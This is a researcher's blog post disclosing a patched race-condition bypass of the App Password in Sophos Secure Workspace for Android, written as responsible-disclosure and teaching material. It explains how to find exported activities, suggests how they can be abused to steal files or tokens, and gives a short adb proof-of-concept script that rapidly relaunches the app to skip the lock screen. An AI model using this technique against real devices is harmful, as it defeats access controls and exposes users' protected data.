Featured image of post Sophos Secure Workspace App Password Bypass using Race Condition

Sophos Secure Workspace App Password Bypass using Race Condition

A race condition in Sophos Secure Workspace (Android) version 9.7.3081 that bypassed the App Password.

Note:

  • Sophos quickly resolved this issue on September 27th 2021.

An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.

During a Mobile Penetration Engagement, I always check the App components that are exported, This means that they can be directly called by other Applications. In some cases these exported apps can be use as a leverage to bypass app restrictions ;)

Identifying Exported Activities

You can look for Exported Activities in the App’s AndroidManifest.xml

  • If the activity has android:exported=“true”
  • If android:exported is missing but it has atleast one intent-filter

Here is an Example of a Exported Activity

1
<activity android:exported="true" android:name="com.app.damnvulnerablebank.SendMoney">

Exported activity with intent filter

1
2
3
4
5
<activity android:name="com.app.damnvulnerablebank.SplashScreen">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>

You can also use drozer to automate finding exported activities, But I would not recommend this since automated tools are likely to miss something.

I found one, But now what do i do?

The exploitation of this relies on the functionality of the Activity. If the app uses android-webview We can get an XSS or Open redirect. If you found an activity that export or upload file maybe we can use it to steal sensitive files i.e user token and others.

Timeline

  • September 04, 2021 - Reported the Vulnerability to Sophos.
  • September 09, 2021 - Sophos acknowledges the Vulnerability.
  • September 27, 2021 - Update 9.7.3115 was released on Google play fixing the bug.

Advisory and CVE

Proof of Concept

The script below automates the process to exploit this vulnerability

sophos.sh

1
2
3
4
5
6
7
8
9
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity
sleep 0.5
adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME
sleep 0.5
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity
sleep 0.5
adb shell am start -a android.intent.action.MAIN -c android.intent.category.HOME
sleep 0.5
adb shell am start -n com.sophos.smenc/com.sophos.smenc.ui.MainActivity

Video

ctulhu.me | Christian Niel Angel
Built with Hugo
Theme Stack designed by Jimmy